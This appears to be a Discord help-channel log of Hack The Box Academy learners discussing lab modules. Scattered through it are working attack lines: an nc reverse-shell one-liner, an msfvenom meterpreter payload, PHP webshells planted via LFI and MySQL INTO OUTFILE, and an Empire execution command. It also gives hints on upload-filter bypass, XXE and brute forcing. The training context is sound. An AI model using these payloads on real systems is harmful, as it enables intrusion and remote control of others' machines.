I need to download the vhd and mount it to find the administrator password.
When i'm connected with the first user the tsclient is empty.
Can anyone help me please ?
I'm still struggling with dsquery🫠 anyone free for a dm so I don't spoil the question? It's the last question of Living off the Land in AD Enum & Attacks. Using dsquery and ldap to find the flag in the description of a disabled account with admin privileges
How do I get a gui to see nessus in the vuln assessment module? It seems like it should be run from the target machine, not the attack box, but xfreerdp doesn't work
Navigate to the web interface at the end of this section and log in with the provided credentials.
So, https://TargetMachineIp:8834 ? That times out for me
Right, nvm. Discord added the final / for me but I hadn't done that in the address bar, that's why it didn't work
Thanks @rustic sage
(the earlier section "getting started with nessus" mentions ip and port but not that it's required to add a slash at the end)
.. Actually it doesn't work at all now, even after resetting
Sorry my mistake, d* user cannot login with ||RDP||, I was able to download the file with smbclient. I mounted it on a Windows machine, not quite sure how that would work on Linux
yo thanks for this man. I was stuck on this for 2 days had to search thru this history.
should've been taught in the modules
Hello
Yes it's not possible with rdp.
I tried with smbclient but it didn't work and with smbmap the file is empty
I will try again with smbclient
I will try to see if it is easier to mount the file on a windows machine
find a way to mount smb; as the file is quite big it will likely time out and corrupt the file transfer
Anyone here good with PS Empire
Hey
crackmapexec smb 10.129.2014.178 -u robert -p 'Inlanefreight01!' -M empire_exec -o LISTENER=http
/usr/lib/python3/dist-packages/paramiko/transport.py:236: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
EMPIRE_E... [-] Unable to connect to Empire's RESTful API: HTTPSConnectionPool(host='127.0.0.1', port=1337): Max retries exceeded with url: /api/admin/login (Caused by SSLError(SSLZeroReturnError(6, 'TLS/SSL connection has been closed (EOF) (_ssl.c:997)')))
I am getting this error
Have confirmed the API is running
🔥
Hey guys, I hope this is the right place to ask this. I just completed the LFI module in the academy and just had a question about URL encoding. When do you know to URL encode vs when to not? For example we encode the webshell "/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E" but not the COMMAND: ?language=/var/lib/php/sessions/sess_rq2rp1ehi08i58doec2adragi4&cmd=id. Thanks and sorry if thats a long block of text!
You're dropping too many fire courses on the nations. Show us mercy 😁
💪
Is it normal that I have to keep resetting the targets all the time? For example on the Nmap-module, after each scan the target becomes unresponsive and I have to reset it. This system seems to have major stability problems when compared to other similar sites
no its not normal. try resetting the vpn connection. only time i have to reset a target is from running out of time on it
File Upload Attacks - Type Filters: Can anyone give a nudge? I am able to upload a file but not able to get the directory to properly execute the php code.
have you tested your nested extensions?
Yes, I run intruder on the wordlist made from the bash script(added phar and phtml) and get multiple 193 codes. But when I visit that page it says 404 even though the initial request stated it went through.
also you have modified the content-type right?
and you have added some magic bytes as well?
The only magic byte that I have been able to get successful is || GIF 8 and I change the content type to image/jpg, image/png, and image/gif. ||
so far so good, try to focus on the filename extension
Ye, I know I'm close just tryna figure out what last part is wrong. Gonna take a break for a couple mins to reset the brain lol
yup, thats a good idea
my flag at attacking common service doesn't work, dns section
check for white spaces
i already checked
When will the job-role path be added?
Hello! Everyone I am new here
Hi, I need some help for Pivoting, Tunneling, and Port Forwarding module, in the Skills Assessment. How do I transfer the Mimikatz to 172.16.5.35? I can't seem to ssh from either the attack host or the foothold host. Thank you.
my college domain is not registered on HTB website !! how would i take student pack
It makes no sense to ask the same question in different channels
okh sry
When using xfreerdp you can copy and paste files from your attack host to the target. (unless its disabled, which it isnt in the case of the skill assessment)
anyone available for this?
What is the type of the service of the "syslog.service"?
I wrote systemd service
But it's wrong
you can either, like Skippydoo said, use xfreerdp and the /drive: tag to mount a directory on your machine as a shared network drive on the target machine, or another method is to upload the Mimikatz file onto the first machine that already has a website running and then from the next machine just use wget from the first one
sure shoot me a dm if you still need help
what module and section are you on?
I'm not going to give you the answer but if you search the man pages of systemctl you'll see a parameter you can use to help you
it's an addition to the new Linux Fundamentals
oh yeah i did see that module got some update but i haven't done that 🤣
So can someone answer this
try systemctl or journalctl, maybe systemd
With the htb academy modules
When there is an update with a module
U can see that in blue at the right top
Is an update always a new section
Or could it also be an old section that is updated
And if so how do i know what is new?
When an update is a whole new section it's clear
in the changelog
Ai tnx
@cunning prairie
How do I find nessus on the running instance? I'm completing the vulnerability assessment module, but not seeing nessus. Also not seeing the prepopulated scan results anywhere
Hello there, i'm at the start of the windows fundamentals Module, but it seems i've got some issues with xfreerdp, i can't connect most tries, and even when it connects i'm getting cut off after a minute or so
Check that you don't have a pwnbox instance open at the same time you're connected via openvpn.
Hi. Can anyone help me with "Getting Started Privilege Escalation" ? I have made it to user2 and find id_rsa. I copied the content of the id_rsa and created a file on my computer with the same name and content.
On victim's machine
Cat id_rsa
Copy the content from id_rsa
On my machine
Vim id_rsa
Paste the content
Chmod 600 id_rsa
i try to connect ...
||└─$ ssh user2@165.227.228.154 -p 30076 -i id_rsa
Load key "id_rsa": Permission denied||
What am I doing wrong?
still need to enter the password for user2
@autumn pilot Hey, may I ask, is PNG a part of any of this?
@wintry lark What are the permissions on the id_rsa file?
Hey thanks for the info, yeah Openvpn was still running, but the issue is still the same, even after killing the openvpn process. I also tried via the browser version of the pwnbox, but there I get another error:
[18:59:14:690] [4992:4992] [ERROR][com.freerdp.client.x11] - failed to open display: :1
[18:59:14:690] [4992:4992] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
I've done it with gif
Hmm... I've never encountered that error. I've had a similar issue from the one you described where my connection would cut off and then come back on after a while and discovered that it was because I was connected with openvpn and had a pwnbox running at the same time, so I thought that might've been it.
I'll try again later, with a new instance, maybe it'll work then
-rw-r--r-- 1 root root 2602 Feb 12 2021 id_rsa
@wintry lark run the command with sudo, or change its permissions. When ssh goes to use that file it has to have certain permissions for you to execute, but it also cannot be too exposed permission-wise.
Hey there!
I've been stuck for a few days on the Weak Public/Private Keys section of the Attacking Authentication Mechanisms module 😐 , still can't receive the JWT from the response.
I have:
imported pub.crt and privat.pem;
changed logged in username value to hackme;
assertions successfully signed
however my request is still attempting to redirect me back to the root web directory.
Can someone tell me what have I missed ?
Can someone help me with this question: Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer. - In Web Service and API attacks - Information Disclosure (with a twist of SQLi)
I've tried searching for this exact ID and the area around it with the script but finding nothing
Did you already find a vulnerable parameter?
thanks:) i captured the flag...i used the wrong user :/ but your hint to check the permissions showed me the right user 🙂
Find a vulnerable parameter and apply a basic SQLi statement!
i have a new hatred for MSSQL
Yes it's the same as in the example, however when I try to search for it with the python script with the position 736373, I get nothing
try different tools. ffuf worked for me
How do I use dsquery to search for a user with administrator privileges and disabled for the Active Directory module
I can search disabled accounts easily I just don’t know how to search for admin perms and googling ad help is hard
But I got the parameter with ffuf, Now I'm trying to find the person in position of 736373 using this parameter that I found
@autumn pilot Can I dm ya?
sure
Can you show me your output in the dm?
Hola y'all
there is something wrong with target alive time. It says 90 minutes when i spawn it; after 10 minutes it's down to 30 or something like that
Has anyone gotten the LOGIN BRUTE FORCING Skills Assessment - Website to boot up? The IP + port it indicates doesn't show up. I have been resetting for a while now
I have done that assignment yesterday, without any probs
It might just be malfunctioning then. Tried it inside the parrotvm instance and on my own machine
hmm, I can try in a bit tho!
Maybe HTB is getting overloaded by people bruteforcing 😆
The password bruteforcing should really be dialed back. It seems like a staple of every module
which SA are you doing, since you have 2 SA's? @rich light
Linux fundamental. Task scheduling
The first one
I am able to reach it tho
It's public IP.. you should be able to use this iP + Port as well.
Alright, resetting again got it to finally work
@dim hound Thanks for the second set of eyes
No worries! Good luck 😁
Atm I am re-doing broken authentication tho! I do think that's one of my fav
I planned my exam (CBBH) on the 17th of April
I tried a lot and still haven't found it
look through the man pages. There is a parameter you can use to return what type the service is.
if you still can't find it feel free to DM and I'll help you
I had trouble with this earlier. If you still need help feel free to DM
hey guys, i hope y'all are doing well, so i've been trying to do this question, but i cant even do the nmap scan, is there something i am doing wrong
the question is "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)" from the getting started module
Can someone help me with this, it's exactly like in the instructions, and I'm supposed to find the position: 736373 -
Shouldn't I see it if I replace the number with the one I'm looking for ?
Has anyone done the ACL Enumeration section of AD Enum and Attacks and remembers how many rights forend has over the GPO Management group? Bloodhound shows only 2 for me and neither work as answers... Curious if I'm doing something wrong or if Sharphound missed something
Could you fix the problem?
Yeah
Can someone help with attacking email services
Found pass for m*****
Logged in
But dont seem to find email
it is not that easy. If you don't have an antivirus that can detect the malware and remove it, you need to do some forensics. Use wireshark, a process monitor, and review some log files to start with in order to identify the malware file. Once you identified it, you need to reverse engineer it to try to figure out all the objects it drops into your system and what it does. Once you know, it makes it easier to figure out what to do to remove it. The easiest thing would be to reload a backup if you have one.
Thank you!
I solved this with help of the Internet, but if anyone is available to explain the process I'd much appreciate it🙏
Can someone help me with the File Upload Attacks - Skills Assessment. I fuzzed. I read the source code for index and upload and located the upload directory. I get the following error when trying to visit my upload:
"The image "http://Path_To_Upload_Directory.jpeg" cannot be displayed because it contains errors."
Can someone give me a hint please?
hello in the Pivoting, tunneling, and portforwarding module I have a problem specifically in "SOCKS5 Tunneling with Chisel", I am trying to run chisel but I have the following error: ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.4' not found (required by ./chisel),
I was trying to download old versions and I still have the same error, any ideas?
any help with question, "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." i have tried everything and still not working
Can someone help me with the vulnerability assessments module? Nessus isn't on the pwnbox. How am I supposed to complete the nessus skills assessment?
Openssl is not working and ports 993 and 995 are filtered
You should first list the Module name. Then section. Then question.
Also search the question in the discord before asking. I also like to google too.
Password attack , PtT for linux , question 8 .
Anyone here running nethunter termux? Can't get the vnc server to connect
I can try to help. DM me
THIS IS SPARTA
are you using a VM? or just the pwnbox?
Forget it its done
this one you need to pay attention to the principle in the klist of the system keytab
it's web-based
How do I access it?
Navigate to the web interface at the end of this section and log in with the provided credentials. Read the requirements section before jumping to the question
I did read it. I don't understand how to navigate to the web interface. the modules didn't talk anything about that
a web-based gui. once you start the nessus service you go to localhost:<theportitgivesyou>
in firefox
you start the server at the bottom and go to http://<ip>
oh sorry yea the ip for the machine. localhost is for running on your own machine
I get an unable to connect page when I navigate to the ip address given
did you do the port as well? should be ip:port
I contacted support and they said to use port 8834, but I still get the unable to connect page
I just tried it again and now it says Bad Request
Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead, please use the HTTPS scheme to access this URL.
np
I'm having the same issue now with openvas. Does anyone know the port i navigate to? I tried 9392, but that didn't work
it should be the same thing just a different port. error?
can someone please help me with broken auth skills assessment... I have the user and password but unable to change the cookie.................got it sorted
Hello. I really need help with Attacking Common Services Hard. I wanted to do all modules by myself but after spending 2 weeks of research, I'm literally beating my head against the wall. So far, I know that I need to impersonate the *admin on the linked mssql server to enable xp_cmdshell. The problem is I'm not able to find the correct syntax. Is there a good Samaritan to give me a hint please?
Nevermind. After asking my question, my brain woke up and I finally caught it.
can I get a nudge on the getting started module knowledge check? I am trying to obtain the root flag. I downloaded LinEnum.sh, and ran it using "bash LinEnum.sh", but all it resulted in was a bunch of text to the terminal then scan complete
you have to read the results, it'll come back with what it found, from there you can look for processes or other exploits. usually the best results are towards the end of the report
It's just a bunch of file names, not finding anything of interest. And I didn't even see root.txt listed
I don't see any processes or other exploits listed
I found the section of user can run the following commands, but it just says ALL
May I have some help with Pivoting, Tunneling, and Port Forwarding - Meterpreter Tunneling & Port Forwarding. I'm trying to utilize the meterpreter payload shown in the module to attempt to receive a meterpreter session. I keep on receiving the following and the command shell session gets closed immediately.
hey anyone can guide me regarding bug bounty
Make sure you're using the correct one, windows/Linux, reverse http/tcp
Utilizing the following payload:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 -f elf -o backupjob LPORT=8080
Help with what
Shouldn't that be reverse http? If I'm remembering that module correctly?
Specifically using Linux/x64/reverse/TCP iirc
If that's what it's expecting
I've never seen the syntax "http" utilized in msfvenom payloads before. I will give that a shot. Where should the http syntax be added? Also unsure of the "iirc" syntax or if that was a typo.
Iirc stands for "if I recall correctly"
in need of a nudge in the metasploit module if anyone could assist
Instead of reverse_tcp, reverse_http
That section though I think walks you straight through it
Hi all,
I'm in the Active Directory Enumeration & Attacks, Attacking Domain Trusts - Child -> Parent Trusts - from Linux section. ||I'm very confused by this lab. I've tried to get the NTLM hash for user bross by doing what is described in the section text, but it seems to be targeting the child domain and not the parent domain? So I tried targeting inlanefreight.local and freightlogistics.local but neither htb-student nor htb-student_admin seems to exist on those domains. Using nmap I found that 172.16.5.240 is logistics.inlanefreight.local, so if I want to hit the parent domain I will need a completely different IP address? How do I find this IP? Why is there no enumeration/recon section for the Linux section? Am I even on the right track?||
Thank you @fathom pendant I will give that a shot and thank you for adding to my acronym vocabulary 😃
@magic valve could i get an assist on the metasploit module?
Help with what? You haven't asked your question
I am doing the pentesting path a little out of order and have not completed the Metasploit module as of yet.
That is the most verbose question
It tells you exactly what to do
It tells you you have an incomplete cookie and to fuzz it until you get one that works
how to do it the right one
please could you check mine
the right way to fuzz from hash last letter after that to encode
No, I haven't done that one, but I'm sure someone who has done it can answer your question better, in the meantime, reread the section
anybody done that please inform me
Anyone help me with: WEB SERVICE & API ATTACKS -- I need to use SQLi to get 'user that has a position of 736373' There is no mention or example of SQLi in the chapter, the instructions in the section does not seem to have anything to do with this task
Anybody help me.. what is the type of service of 'syslog.service'?
anyone that has done AD Enumeration & Attacks - Skills Assessment Part II? I need a nudge on Q8
You want to utilize the user from Abusing ACLs to retrieve bross's hash. Let me know if you need any more help after this hint.
Utilize lazagne.exe at the beginning. Let me know if you are past that/need more hints
my flag doesn't work
Hi could someone help me for Command Injections - Skills Assessment ?
Okay so this cant be hard, Hacking Wordpress - Login
I'm curling <methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
But the response I'm getting, I'm not understanding how this is showing me the list of methods?
hi
IS THER ANYONE WHO KNOWS HOW TO OPEN A PASSWORD PROTECTED WORD DOCUMENT WITHOUT PASSWORD
if anyone knows, please let me know
it's very urgent
What do you need help with? I got the first flag, but still working on getting root
@tight mesa which problem are you facing
getting root on getting started knowledge check. I got a shell using metasploit, then used LinEnum.sh, but didn't get any good info from that. There was a section that said get sudo privileges that just said ALL
User htb-ac482683 may run the following commands on htb-faqemo2psd:
(ALL) NOPASSWD: ALL
what options did you set on the metasploit exploit?
rhosts to target ip and lhost to my ip
just that?
@tight mesa switch to root
which exploit are you using?
I did sudo -i outside of the meterpreter shell, and it switched to root, but when I search root.txt, it says no file or directory found
getsimple
nvm i got it working
Use cat /root/root.txt
it was apparently just an internet problem
says no file or directory found
glad you figured it out!
Can someone help me on the Internal Password Spraying - from Windows?
Can't rdp. xfreerdp just shows the window all black. rdesktop says the credentials are incorrect 😂 . I am able to use evil-winrm but the DomainPasswordSpray tool just freezes.
These are the directories I have access to: Desktop Downloads Music Public Templates
Documents go Pictures roobee Videos
okay, I navigated to the home directory and I only see user htb-ac482683
@tight mesa what about sudo su
nothing happened when I was already root user, so I'm going to restart msfconsole and use sudo su instead of sudo -i
okay I used sudo su and I'm getting the same result. no root directory, no file found with cat /root/root.txt
@tight mesa use whoami to see who you are on the system
says i'm root
@tight mesa ok use locate or find to find the flag using wildcard
I use find root.txt and it says no file or directory found
what's wildcard?
@tight mesa like using *
I did find -name root.txt this time and it said this: find -name root.txt
find: ‘./htb-ac482683/.cache/doc’: Permission denied
a bunch of files, but no root.txt
I have to go soon, ugh I feel like I'll never crack this
I'm going to post in the htb forum
@tight mesa you can do it 💪 use pwd which directory are you in
so I reset the pwnbox and root directory popped up! When I did locate root.txt, the file that popped up was just a word list, so I'm going to do some searching, but I think I might be onto something!
@tight mesa can you dm me with the screen shot
Hi, I'm working on Attacking Common Applications - Skills Assessment II , but I'm stuck on this question: What is the admin password to access this application? any tips/ ideas ?
hello, I am doing the getting started module and the nibbles box, it says that it doesn't need a password for executing a monitor.sh file, but when I do it, it asks for the password
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
this was appended to the monitor.sh file after gaining the initial access as told by the module to do so, but while doing sudo /home/nibbler/personal/stuff/monitor.sh
error comes:
'unknown': I need something more specific.
/directories/ [[: not found
and when I do normal sudo it asks for a password, but according to the module this wasn't supposed to happen
posted this in #1083005652147904562
in the modules like footprinting SMB part, there are commands as examples like we have to do them like an exercise but the ip doesn't resolve to anything
the practice is only the questions at the end??? or we must follow the examples like this
May be helpful to watch Ippsec’s video on nibbles.
@lyric raft yeap look for the version of snmp
@lyric raft no
@lyric raft use nmap
alright
HI,
For the module attacking common services in Attacking SQL Databases.
I am connected with the given identifiers except that I have no access to anything.
When I list the users I can't even find htbdbuser and I can't find mssqlsvc either.
I'm a bit lost. When I do select user_name() apparently I'm a guest, but when I do SELECT * FROM flagDB.INFORMATION_SCHEMA.TABLES; I have this response :
The server principal "htbdbuser" is not able to access the database "flagDB" under the current security context.
because the user isn't allowed
in the db there is a user that is allowed
I'm stuck at the easy lab common services, I can't get access to the server, what am I missing?
I tried to brute force ftp mysql rdp
Thanks
I don't really understand how i can change the user.
We don't have other credentials.
In the course everything is mixed up i'm lost on this part.
hello
I'm trying to solve a module but I have problems
can somebody help me?
this is the exercise Crack the following hash using the rockyou.txt wordlist: 0c352d5b2f45217c57bef9f8452ce376
this is what I'm doing sudo hashcat -m 0 '0c352d5b2f45217c57bef9f8452ce376' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
you need to fix your rockyou file
still stuck
pls help
@rustic sage worth knowing about: https://superuser.com/questions/1387114/using-hashcat-to-load-a-compressed-wordlist
Hey, I am on the skills assessment part of the CrackMapExec module.
"Your first task is finding a valid account and trying a common password using different protocols."
I have tried all protocols - local and domain login
with all usernames and passwords that were mentioned during the course training,
I haven't had a single hit yet.
The hint says: Review "Exploiting NULL/Anonymous Session", what can you use to enumerate users?
I still get access denied when trying any of these methods.
A nudge would be helpful if possible
For SHELLS AND PAYLOADS: LIVE ENGAGEMENT
Hi guys, I am currently stuck on host 1. I am unable to upload a .war file onto the target. I tried everything - online scripts, msfconsole and whatnot. I do not have a browser on the attacker machine which makes things a lot harder since I am unable to upload to tomcat manager with 'curl'. Any help would be greatly appreciated.
we need to use the ||spawned target as a pivot host, then use proxychains crackmapexec to target the machines in the internal LAN||
I opened up Burpsuite and used their browser lol. I couldn't find a browser on the machine either
good to see you jared
Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.
I have found how to decode the HTBPERSISTENT cookie
how do you re-encode back after modifying the value?
Shells & Payloads Laudanum, struggling with 2nd question, I've submitted a few and none are right
Can someone please help me with SQLmap skill assessment 🙂
https://academy.hackthebox.com/module/144/section/1257 - I am having a hell of a time finding the flag for question #3. Any tips?
To be more specific Information Gathering - vhosts question#3
What exactly would you like to know?
So they are just meant to be examples and not something we must do on our side?
nevermind - easy lol - Tip use a tool not in the section - only gripe, you're not really taught about directory brute forcing yet and you need it for the last questions.
Trying to find the right tamper script to use, I've tried just about all. I have success with 'space2comment', but I can never dump the tables because it errors out
is anyone else having issues attacking common services easy lab? seems all my brute force techniques get closed out due to errors
Try it with || between ||
Hello, in Skills Assessments of Pivoting, tunneling and port forwarding, I have a problem in question 4, which is basically connecting to the windows machine, I was doing|| chisel and meterpreter|| but when connecting to the windows machine I have timeout/error problems (||I have the user webadmin and the credentials mlefay , as well as the ip x.x.5.35||) any ideas or hints?
I haven't made it that far yet.
I'm stuck on SMB attacks
Received the following error when trying to input http into the payload:
i guess if it says use TCP, use TCP ¯\_(ツ)_/¯
yea for some reason that was the toughest out of them all
yeah I can believe that. I have used smbmap, smbclient, crackmap and I can't find the password for j or copy the id_rsa
Hey where can I learn Burp Suite from the beginning for free?
No worries @fathom pendant . Thanks for trying to help anyway 😃 . Anybody, may I have some help with Pivoting, Tunneling, and Port Forwarding - Meterpreter Tunneling & Port Forwarding. I'm trying to utilize the meterpreter payload shown in the module/shown below to attempt to receive a meterpreter session. I keep receiving the following, and the command shell session closes immediately. I've attempted to reboot the machine multiple times but still receive the same thing.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 -f elf -o backupjob LPORT=8080
now I will say I got the flag. but it wasn't through smb... I'm not sure if I even did it right, I just stumbled on it
Can I DM someone about Abusing ACLs? I am stuck.. getting many errors..
Really need some help with the terrible so-called "easy" lab in Attacking Common Services. I've managed to brute force the credentials for ||fiona@inlanefreight.htb|| I have also found the ||documents on the FTP server||. I went through all the tables in MySQL. ||I have tried SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:/xampp/htdocs/webshell.php';|| But when I go to the URL I get an error: Notice: Undefined index: c in C:\xampp\htdocs\webshell.php on line 1
Warning: shell_exec(): Cannot execute a blank command in C:\xampp\htdocs\webshell.php on line 1
Try spinning up the PwnBox and use, systemctl show syslog.service -p Type
Been stuck on this horrible lab for hours, without any way to proceed.
it just complains because you didn't give any command to execute through your GET c parameter
?c=
give one and you will see the error will not be there after
Proper indentations
context: "this is known as Minified JavaScript code. In order to properly format the code, we need to Beautify our code."
I am working on "DNS Enumeration Using Python" your python code is very package version dependent and you don't supply a virtual environment or requirements.txt ---- GROSS
ah so I guess I just had to slow down hydra. no errors so far
Can you give an example of such a syntax command? I'm looking everywhere in this module and the shells & payloads modules, but there isn't any example of this method. The example in this module only states mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
I don't know how to proceed with this.
The lab in the academy are so slow 😦
10.129.25.97/nibbleblog/admin.php?controller=plugins&action=list
constant timeouts 😦
when you go to webshell.php page you type your command after the GET parameter c like webshell.php?c=whoami
shell_exec($_GET['c']) in your webshell means that it will execute whatever you give after the GET parameter called c
Thanks. I've managed to see the contents of the directory with ?c=dir but I don't see a flag
check other directories
I'm still having issues on this common services easy lab. was able to start bruteforcing a service with the f user but it's been going on for 10k passwords on rockyou.txt. any nudges?
Use Hydra and be sure to specify the full username of user F (so including domain). The password list is correct.
Still stuck. I see a ||passwords.txt|| file but I'm unable to open or view it.
I'll try it with that. my other problem is errors and the connection getting closed after "too many errors"
and what do you know. I found the password now
I haven't been in that particular module just yet. but what happens when you do try to open the file?
errors or access denied?
Yes, it's important to specify the full username.
I have managed to read the contents of ||passwords.txt||. The file gives more instructions and credentials, I'll try and continue this tomorrow. Getting sick of it for today. I can't believe this is just an "easy" lab, supposedly, could be me, but it sure as hell doesn't seem easy to me, ugh.
how I felt about the easy passwords lab lol.
Yeah, I can imagine. Some of these labs are just terrible imo and don't connect to the material in the module at all. If this is to be any indication for the exam, it's going to be rough, really rough.
Can someone assist with: WEB SERVICE & API ATTACKS - Question: Identify the username of the user that has a position of 736373 through SQLi. | I have located the vulnerable parameter and SQLi using SQLmap, but I don't understand how to get the info for the position with this knowledge.
Question about this one - Web Edition - Virtual hosts: Find the specific vHost that starts with the letter "d" and submit the flag value as your answer (in the format HTB{DATA}). Did anyone use the 2nd zone to find the vhost starting with a "d"? The instructions say you only need www.inlanefreight.htb to solve those questions. I've used the seclist/discovery/dns/namelist with ffuf, gobuster and dirb. I can't find the last vhost. Can someone please throw me a hint?
File Uploads - Skill Assessment:
Bruh what just happened, managed to capture a request and change data to some xml that shows base64 encoded source code of the page. Got it but realized it was for the wrong page, tried it again and now the same method doesn't work lol.
Infuriating xD
Did anyone ever get this to work?
Any ideas?
hey, is a "serial" also known as a petition?
context
The developers may have implemented this function whenever they need to generate a serial, like when clicking on a certain Generate Serial button, for example.
Can someone help me with the File Upload Attacks - Skills Assessment. I fuzzed. I read the source code for index and upload and located the upload directory. I get the following error when trying to visit my upload:
"The image "http://Path_To_Upload_Directory.jpeg" cannot be displayed because it contains errors."
Can someone provide a hint?
Ugh, so I have managed to get the flag. Both ways, apparently, via ||MySQL|| and via ||webshell||. If you ever need help on this, hit me up.
well I was able to get the webshell loaded. just having issues getting it started. I'm currently in the mysql but I don't see anything that'd help me load it differently
||Try fuzzing for allowed PHP extensions||
@elfin nacelle may I ask how you read the source code? I got mine to work the first time somehow but now it doesn't want to work lol.
You can skip the webshell all together if you want and ||use the read local files option|| specified in the module, just ||change the directory to the path of the flag file||.
I may try that. but I do want to know how to get this webshell working just so I know for future reference. the shell was pushed into the ftp and curl just pulls the file in a readable format. can't seem to find it on the webpage itself to start
Did you try ||XXE with an SVG file?||
I took all the names starting with the letter "d" from wordlist "namelist" in "seclists" and still couldn't find it from my VM.
Any tip as to what the password is? I've tried all the common ones from the course content and none of them have worked. Spent the last 1.5 hours password spraying
Be sure to place the webshell in the directory that's specified in the document you find on the ftp. Then in the browser go to localhost/nameofshell.php?c=dir (for example)
To read I capture the request in burp, send it to repeater and use the xxe payload to get the base64 source and decode it by sending it to decoder.
Yes, I am sincerely confused as I captured a request of uploading a jpg file, ||simply decided to tinker with the XXE method and just replaced the content with it, and it gave me the source code but it was for the index.php page. I went to redo what I did and it didn't work. I didn't change the content type on the original one as I was shocked to see that it worked. But now it doesn't. But anyways lol.. how could one get an svg file across? Lemme recheck but I thought it didn't allow svg file uploads. I have been messing with the content type and switched it to image/svg+xml but I keep getting internal server errors every time I add my payload ||
ah....I'm using the wrong type of php shell...I'm using a rev shell
I did the same. It worked the first time but now even after resetting the machine multiple times it doesn't. So, || you upload a jpg or png file, capture the request, change the contents to the XXE payload, and that worked for you? It did for me but now it's not and I'm not sure why ||
Yeah, that's not going to work. You need the webshell from the example in the module.
It's under writing files to MySQL or something.
||Check that client-side filters aren't in place, every time you refresh the page you have to disable them.||
got it. thank you. I got so tunnel-visioned on this one after the issue with the password
Did you get the flag?
not yet. searching for it. but the webshell works
👍🏼
Could anyone explain this calculation to me ? I have a hard time understanding this one
It's from the Module: Stack-Based Buffer Overflows on Linux x86 in the "Determining the length of the shell code section"
@steady hawk || Even after disabling client side checks like onchange or adding .svg to accept it still doesn't allow me to upload an svg file ||
DM me
|| Ffs, tried uploading svg file after deleting the accept stuff, didn't work. Decided to try to delete it and try a regular png file, capture request and change contents, it worked but I realized I had the source code for index.php again and not the upload.php lmao. Tried doing same steps and didn't work, lemme try tinkering with it again. ||
Haha nice, you got it. Feel free to DM me if you have any other questions.
Yes. Still having the same issue.
If anyone has done the Whitelist Filters module in the academy I could really use a nudge.
Did you try ||double extensions|| ? That's what got me while doing it
Hey, is https://academy.hackthebox.com/module/110/section/1086 machine broken or is it just for me? it launches and crashes
I believe so. However, I may be doing it incorrectly.
I'm going to try a couple more things, may I DM you should they not work?
Of course
anyone completed Web Proxies that can give me some help ?
hello how can I link my htb account on discord
using the ++verify
I have posted on the forum as well, the Whitelist Filter challenge under File Uploads section in the academy. I have tried all of the techniques, am able to find some paths to upload to but none of them are rendering my php. When uploading with the bypasses the path my images are going to is .jpg or .png not a .php path as described in the exercise. Any help would be awesome thanks in advance.
EDIT: GOT IT
iirc you're not supposed to use the default fuzz list they have you make, you're supposed to extend it to more options
i.e. if you're just copy pasting from the section instead of actively applying the information then it'll never work
Yeah man I am actively applying the information, I have been at this for 2 days and I finally got it. I was just looking for a nudge, I had already expanded the wordlist. I was thinking none of the files were being created in the directory with the extension. As I was getting pages returned when just going to .jpg or .jpeg but when I added the full file path of my successful uploads I got it.
I'm not sure why you wouldn't use the full path in the first place, but hey got it working!
I did for the first few successful uploads and was getting the 404 or 403. When I didn't get this going to profile_images/.jpeg I was thinking my file was being sent to that instead. When I went back and checked the full path for ALL of my successful ones I ended up getting it. Thanks!
Module Password Attacks
Section Pass the Ticket (PtT) from Linux
Question : Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
I can get the flag from the share but it is not accepted. Has anyone been able to fix this issue?
Edit: So, I guess there are two flags ... the one you find in \DC\01\julio doesn't work, but there is a second flag in a different location that works...
I think that machine is used for 2 different sections, same thing happened to me.
I need some help with SQL map essentials OS exploitation, once I get to the os-shell I can't go anywhere, I've uploaded shell.php to the target but don't "hear" anything on netcat... any help into the right direction of finding the 2nd flag would be greatly appreciated.
Can someone DM me to help me hack my roblox account back? I can prove it is mine, I have evidence
Im willing to pay accounts with high value
that's not what this discord is for
Module: Vulnerability Assessment
Section: Nessus skills assessment.
Question: Is it known that the log4j plugin isn't running correctly? This caused a lot of headache with resolving the question
"What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?"
Was only able to answer the question by reviewing the pre-populated scan information
Sounds like a skill issue: but not what this discord is for
trying to figure out "Find the password for the ldapadmin account somewhere on the system. " from windows privesc module, can someone give a hint?
one thing i wanna ask is
am new here
so
I can't do the connect to htb
in their website
you know??
so can someone help me?
yeah
Are you able to help with this?